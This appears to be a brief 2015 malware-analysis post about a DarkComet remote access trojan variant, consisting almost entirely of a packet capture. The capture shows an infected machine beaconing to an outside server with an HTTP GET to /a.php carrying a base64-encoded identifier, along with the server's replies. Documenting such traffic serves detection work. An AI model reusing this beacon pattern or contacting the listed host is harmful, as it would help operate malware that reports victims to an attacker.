Darkcomet RAT – Remote Access Trojan Variant GET /a.php?id=

By | June 18, 2015

E..0.;@………@.+..*.P..`$….p……………
2013-02-03 22:49:45.139070 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [S.], seq 1557609149, ack 2358992933, win 64240, options [mss 1460], length 0
E..,[J……@.+……P.*\.:…`%`….T……..
2013-02-03 22:49:45.139138 IP 172.16.253.130.1066 > 64.235.43.131.80: Flags [.], ack 1, win 64240, length 0
E..(.<@.........@.+..*.P..`%\.:.P.......
2013-02-03 22:49:45.139315 IP 172.16.253.130.1066 > 64.235.43.131.80: Flags [P.], seq 1:73, ack 1, win 64240, length 72
E..p.=@….I….@.+..*.P..`%\.:.P…Q…GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Host: 64.235.43.131

2013-02-03 22:49:45.139579 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [.], ack 73, win 64240, length 0
E..([K……@.+……P.*\.:…`mP………….
2013-02-03 22:49:45.264212 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [P.], seq 1:169, ack 73, win 64240, length 168
E…[L……@.+……P.*\.:…`mP…>…HTTP/1.1 200 OK
Date: Mon, 09 Sep 2013 00:39:31 GMT
Server: Apache/2.4.4 (Win32) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1
Content-Type: text/html

0
2013-02-03 22:49:45.342001 IP 172.16.253.130 > 224.0.0.22: igmp v3 report, 1 group record(s)
F..(.>………………”……………
2013-02-03 22:49:45.364096 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [P.], seq 1:169, ack 73, win 64240, length 168
E…[M……@.+……P.*\.:…`mP…>…HTTP/1.1 200 OK
Date: Mon, 09 Sep 2013 00:39:31 GMT
Server: Apache/2.4.4 (Win32) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1
Content-Type: text/html
